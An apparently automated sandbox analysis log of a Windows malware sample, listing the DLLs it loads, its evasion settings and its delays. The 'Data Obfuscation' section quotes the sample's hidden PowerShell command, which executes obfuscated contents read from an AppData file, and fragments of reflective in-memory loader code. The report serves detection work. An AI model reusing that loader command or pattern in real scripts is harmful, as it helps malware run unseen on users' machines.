          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Rundholterne89.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000002.00000002.1886651504.000000000936D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unbristled191 $Disobedient $Leddelings), (Bunodont @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anseeligt = [AppDomain]::CurrentDomain.GetAssemblies()$g
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Realkreditinstitutterne)), $Bdeforelgget215bidances).DefineDynamicModule($Resknderiernes, $false).DefineType($Anatreptic39, $Renunciab
          Source: C:\Users\user\Desktop\Rundholterne89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
          Source: C:\Users\user\Desktop\Rundholterne89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043DCA78 push eax; mov dword ptr [esp], edx2_2_043DCA8C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043DD610 push esp; iretd 2_2_043DD611
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043DD0B0 pushad ; retf 2_2_043DD0B1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087E41A6 push 3B640E4Eh; ret 2_2_087E41AD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599157Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599032Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598919Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598804Jump to behavior
